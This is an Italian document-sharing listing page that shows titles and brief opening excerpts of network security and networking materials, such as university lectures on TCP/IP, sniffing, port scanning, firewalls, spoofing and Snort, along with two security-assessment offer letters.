Spett.le Clever Consulting Via Broletto, 39 20121 Milano Spett.le Clever Consulting Via Broletto, 39 20121 Milano Milano, 23 Luglio 2007 n. 20070723.mb29 Alla cortese attenzione: Dr. Antonio Tonani Oggetto: per Attività di Security Assessment per Carige Assicurazioni

Dettagli

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof.

Introduzione alla. Sicurezza: difesa dai malintenzionati. Proprietà Attacchi Contromisure. Prof. Filippo Lanubile. Prof. Introduzione alla sicurezza di rete Proprietà Attacchi Contromisure Sicurezza: difesa dai malintenzionati Scenario tipico della sicurezza di rete: man in the middle Proprietà fondamentali della sicurezza

Dettagli

Uso di sniffer ed intercettazione del traffico IP

Uso di sniffer ed intercettazione del traffico IP Uso di sniffer ed intercettazione del traffico IP Massimo Bernaschi Istituto per le Applicazioni del Calcolo Mauro Picone Consiglio Nazionale delle Ricerche Viale del Policlinico, 137-00161 Rome - Italy

Dettagli

Sicurezza dei calcolatori e delle reti. Attacchi di rete Lez. 8

Sicurezza dei calcolatori e delle reti. Attacchi di rete Lez. 8 Sicurezza dei calcolatori e delle reti Attacchi di rete Lez. 8 Attacchi su Local Area Network Obiettivi Impersonificazione di un host Denial of Service (DoS) Accesso a informazioni sensibili Tecniche Sniffing

Dettagli

TCP/IP un introduzione

TCP/IP un introduzione TCP/IP un introduzione Introduzione Il successo di Internet (rate di crescita annuo > 200 %) e dovuto all uso di protocolli standard aperti (IETF) TCP/IP (Transmission Control Protocol/Internet Protocol)

Dettagli

SPDY & QUIC 29/11/2014

SPDY & QUIC 29/11/2014 SPDY & QUIC 29/11/2014 Chi sono? Carmelo San Giovanni Presidente di IGLU (Gruppo Linux Udine) Membro di: - Associazione Cultura Informatica (AsCI) - Italian Linux Society (ILS) - LibreItalia Life's too

Dettagli

Internet. Port Scanning. Network Scanner Idea. Internet TCP/IP. Owerview

Internet. Port Scanning. Network Scanner Idea. Internet TCP/IP. Owerview Docente: Barbara Masucci Internet Port Scanning Seminario realizzato da: Antonio Autorino Raffaele Manfellotto Luigi Annunziata Negli anni 80 nasce la prima backbone :Arpanet Oggi Internet: un insieme

Dettagli

Internet Protocol Versione 4: aspetti generali

Internet Protocol Versione 4: aspetti generali Internet Protocol Versione 4: aspetti generali L architettura di base del protocollo IP versione 4 e una panoramica sulle regole fondamentali del mondo TCP/IP 1 Cenni storici Introduzione della tecnologia

Dettagli

Parte II: Reti di calcolatori Lezione 13

Parte II: Reti di calcolatori Lezione 13 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II: Reti di calcolatori Lezione 13 Martedì 15-04-2014 1 Instaurazione della

Dettagli

Intrusion Detection System

Intrusion Detection System Intrusion Detection System Snort Giampaolo Fresi Roglia gianz@security.dico.unimi.it Sommario Collocazione in rete Scenari di installazione Snort Installazione e Configurazione su Debian Rete di esempio

Dettagli

Corso di Laurea Specialistica in Ingegneria Informatica Corso di Reti di Calcolatori II Docente: Simon Pietro Romano spromano@unina.

Corso di Laurea Specialistica in Ingegneria Informatica Corso di Reti di Calcolatori II Docente: Simon Pietro Romano spromano@unina. Corso di Laurea Specialistica in Ingegneria Informatica Corso di Reti di Calcolatori II Docente: Simon Pietro Romano spromano@unina.it Sicurezza di rete Parte seconda Nota di copyright per le slide di

Dettagli

Il protocollo IP (Internet Protocol)

Il protocollo IP (Internet Protocol) Politecnico di Milano Advanced Network Technologies Laboratory Il protocollo IP (Internet Protocol) -Servizi offerti da IP -Formato del pacchetto IP 1 Il servizio di comunicazione offerto da IP Connectionless

Dettagli

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori I

Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori I Corso di Laurea in Ingegneria Informatica Corso di Reti di Calcolatori I Roberto Canonico (roberto.canonico@unina.it) Giorgio Ventre (giorgio.ventre@unina.it) Il livello rete in Internet Il protocollo

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall

Sicurezza nelle applicazioni multimediali: lezione 9, firewall. I firewall I firewall Perché i firewall sono necessari Le reti odierne hanno topologie complesse LAN (local area networks) WAN (wide area networks) Accesso a Internet Le politiche di accesso cambiano a seconda della

Dettagli

Crittografia e sicurezza delle reti. Firewall

Crittografia e sicurezza delle reti. Firewall Crittografia e sicurezza delle reti Firewall Cosa è un Firewall Un punto di controllo e monitoraggio Collega reti con diversi criteri di affidabilità e delimita la rete da difendere Impone limitazioni

Dettagli

Livello Trasporto Protocolli TCP e UDP

Livello Trasporto Protocolli TCP e UDP Livello Trasporto Protocolli TCP e UDP Davide Quaglia Reti di Calcolatori - Liv Trasporto TCP/UDP 1 Motivazioni Su un host vengono eseguiti diversi processi che usano la rete Problemi Distinguere le coppie

Dettagli

Sicurezza dei calcolatori e delle reti

Sicurezza dei calcolatori e delle reti Sicurezza dei calcolatori e delle reti Proteggere la rete: tecnologie Lez. 11 A.A. 2010/20011 1 Firewall I firewall sono probabilmente la tecnologia per la protezione dagli attacchi di rete più diffusa

Dettagli

Corso di Network Security a.a. 2012/2013. Raccolta di alcuni quesiti sulla SECONDA parte del corso

Corso di Network Security a.a. 2012/2013. Raccolta di alcuni quesiti sulla SECONDA parte del corso Università degli Studi di Parma Dipartimento di Ingegneria dell Informazione Corso di Network Security a.a. 2012/2013 Raccolta di alcuni quesiti sulla SECONDA parte del corso 1) Dare un nome ai messaggi

Dettagli

Reti di Calcolatori in Tecnologia IP

Reti di Calcolatori in Tecnologia IP Reti di Calcolatori in Tecnologia IP Il Livello Transport e TCP Dott. Marco Bianchi 04/12/2001 1 Agenda Introduzione Indirizzamento Protocolli di livello transport Attivazione e rilascio di una connessione

Dettagli

Corso GNU/Linux - Lezione 5. Davide Giunchi - davidegiunchi@libero.it

Corso GNU/Linux - Lezione 5. Davide Giunchi - davidegiunchi@libero.it Corso GNU/Linux - Lezione 5 Davide Giunchi - davidegiunchi@libero.it Reti - Protocollo TCP/IP I pacchetti di dati vengono trasmessi e ricevuti in base a delle regole definite da un protocollo di comunicazione.

Dettagli

Guida all uso di TCPDUMP

Guida all uso di TCPDUMP Guida all uso di TCPDUMP Tcpdump è uno strumento per l'analisi del traffico che avviene nella rete fisica a cui si è collegati. Capiamo bene che l analisi del traffico della rete, sia per mezzo dell intercettazione

Dettagli

Prof. Stefano Bistarelli. A cura di:stefano Macellari

Prof. Stefano Bistarelli. A cura di:stefano Macellari Prof. Stefano Bistarelli A cura di:stefano Macellari INTRODUZIONE Cosa è lo spoofing Tipi di spoofing Parleremo di: WEB spoofing MAIL spoofing SMS spoofing ARP spoofing DNS spoofing IP spoofing CHE COSA

Dettagli

Petra Internet Firewall Corso di Formazione

Petra Internet Firewall Corso di Formazione Petra Internet Framework Simplifying Internet Management Link s.r.l. Petra Internet Firewall Corso di Formazione Argomenti Breve introduzione ai Firewall: Definizioni Nat (masquerade) Routing, Packet filter,

Dettagli

SniffJoke. http://www.delirandom.net/sniffjoke

SniffJoke. http://www.delirandom.net/sniffjoke SniffJoke http://www.delirandom.net/sniffjoke vecna @ delirandom winstonsmith s0ftpj ESC 2009 TCP, kernel delirium, sniffing, privacy, insicurezza & paura, filosofie di sicurezza. SniffJoke eviscerated

Dettagli

Capitolo 1 - parte 1. Corso Reti ed Applicazioni Mauro Campanella

Capitolo 1 - parte 1. Corso Reti ed Applicazioni Mauro Campanella Capitolo 1 - parte 1 Corso Reti ed Applicazioni Mauro Campanella Precisazione Noi ci occuperemo solo della trasmissione di informazione in formato digitale. Un segnale analogico è basato su una variazione

Dettagli

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client

Sommario. Configurazione della rete con DHCP. Funzionamento Configurazione lato server Configurazione lato client Esercitazione 3 Sommario Configurazione della rete con DHCP Funzionamento Configurazione lato server Configurazione lato client 2 Sommario Strumenti di utilità ping traceroute netstat Test del DNS nslookup

Dettagli

Cenni sul protocollo IP

Cenni sul protocollo IP Cenni sul protocollo IP Parte 2 Domenico Massimo Parrucci Condello isti information science Facoltàand di Scienze technology e Tecnologie institute 1/number 1 Il protocollo IP The IPv4 (Internet Protocol)

Dettagli

Offerta per attivita di Vulnerability Assessment per il portale www.poste.it

Offerta per attivita di Vulnerability Assessment per il portale www.poste.it Milano, 5 Novembre 2004 Spett.le Postecom S.p.A. Ufficio Acquisti Via Cordusio, 4 20123 Milano n. 20041105.m02 Alla c. att.ne : Dr. Alessandro Verdiani Oggetto: per attivita di Vulnerability Assessment

Dettagli

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14. Pietro Frasca. Parte II Lezione 4

Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14. Pietro Frasca. Parte II Lezione 4 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2013-14 Pietro Frasca Parte II Lezione 4 Giovedì 13-03-2014 1 Ritardi e perdite nelle reti a commutazione

Dettagli